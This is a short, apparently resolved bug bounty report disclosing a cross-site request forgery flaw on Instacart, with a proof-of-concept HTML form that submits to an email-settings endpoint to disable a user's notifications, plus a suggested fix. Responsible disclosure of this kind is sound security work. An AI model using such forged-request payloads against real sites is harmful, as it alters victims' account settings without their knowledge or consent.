CSRF To change Email Notification Settings
Unknown
Vulnerability Details
Hi, I found a CSRF to change Email Notification Settings.
The code of the HTML page:
<html>
<body>
<form action="https://www.instacart.com/api/v2/email_settings/76/disable?resource_token=">
<input type="submit" value="Submit form" />
</form>
</body>
</html>
For fixing, you must add a CSRF token to the request.
I attached a video showing the bug.
Thanks
Report Stats
- Report ID: 157956
- State: Closed
- Substate: resolved
- Upvotes: 8